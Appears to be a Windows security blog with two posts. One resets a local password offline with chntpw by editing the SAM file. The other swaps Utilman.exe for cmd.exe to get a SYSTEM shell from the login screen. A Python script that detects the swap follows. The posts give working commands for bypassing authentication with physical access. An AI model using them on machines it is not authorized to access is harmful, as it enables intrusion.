Category: Windows Security

Reset Your Windows Password

We have lots of passwords to remember: workstations, servers, banks, forums, mail, etc. This makes forgetting passwords easier. Today I would like to show how to reset the admin password on Windows.

I am going to use chntpw. chntpw is a Linux utility to (re)set the password of any user that has a valid (local) account on your WinNT or Win2000 system, by modifying the encrypted password in the registry’s SAM file. You do not need to know the old password to set a new one. It works offline (i.e., you have to shut down your computer and boot off a Linux floppy disk).

1. Insert the BackTrack DVD into your Windows computer and boot from it (you can usually hit F2 or F12 to see the boot order, then force the computer to boot from CD/DVD).

2. Mount your Windows partition:

2.1. Run fdisk -l to determine where your Windows partition is.
My Windows partition is /dev/sda1

2.2. Create an empty folder to mount the Windows partition on:
mkdir /mnt/windows

2.3. Mount the partition:
mount /dev/sda1 /mnt/windows

3. Go into the chntpw directory:
cd /pentest/passwords/chntpw

4. Run chntpw against your SAM:
./chntpw -i /mnt/windows/WINDOWS/system32/config/SAM

5. Type the username whose password you want to reset and press Enter, then press 1 and Enter.

6. After making the changes, exit from the main chntpw menu and press “Y” to write the changes or “N” to ignore the changes.

 

Owning Windows Vista with Linux

In this blog post I want to show you a security problem related to Windows Vista.

Vista is mostly criticized for using too many resources. However, did you know that you can “own” Vista by using Linux?

That is right, you can get access to Vista without any password cracking or anything.

First, boot your machine with Linux.

Go to the Windows partition:

cd /mnt/sda1

Now, go to the System32 directory:

cd Windows/System32

Back up the Utilman.exe file:

mv Utilman.exe Utilman_backup.exe

Copy cmd.exe as Utilman.exe:

cp cmd.exe Utilman.exe

Now reboot the machine and remove the Linux live CD from the CD-ROM drive.

Press CTRL+U to invoke utility manager.

Now a command prompt should appear, since we have cmd.exe in place of the original Utilman.exe.

Type whoami to see who you are: System!!!

Type explorer and you can do whatever you want!

This simple example shows how important physical security is, in your company or even at home.
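
A check for the swap described above, as an added example that is not part of the original post: it flags a System32 directory (on a live host or a mounted disk image) where Utilman.exe is byte-identical to cmd.exe, or where the Utilman_backup.exe file from the steps above was left behind. The function names and the script name in the usage comment are assumptions made for this example.

```python
import hashlib
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Hash a file in chunks so large binaries are not loaded at once."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_ci(directory: Path, name: str):
    """Case-insensitive lookup: a Windows volume mounted on Linux
    may be case-sensitive (WINDOWS/system32 vs Windows/System32)."""
    for entry in directory.iterdir():
        if entry.is_file() and entry.name.lower() == name.lower():
            return entry
    return None


def check_utilman(system32: Path) -> list:
    """Return a list of findings for the Utilman.exe swap (empty if clean)."""
    findings = []
    utilman = find_ci(system32, "Utilman.exe")
    cmd = find_ci(system32, "cmd.exe")
    backup = find_ci(system32, "Utilman_backup.exe")
    if utilman is None:
        findings.append("Utilman.exe is missing")
    elif cmd is not None and sha256_of(utilman) == sha256_of(cmd):
        # The accessibility tool has been replaced by the command shell.
        findings.append("Utilman.exe is byte-identical to cmd.exe")
    if backup is not None:
        # Name used for the moved original in the steps above.
        findings.append("leftover Utilman_backup.exe present")
    return findings


if __name__ == "__main__":
    import sys
    # Usage (hypothetical script name): python check_utilman.py <System32 dir>
    for finding in check_utilman(Path(sys.argv[1])):
        print("ALERT:", finding)
```

An empty result only means this specific swap was not found; it does not show the disk was never modified offline.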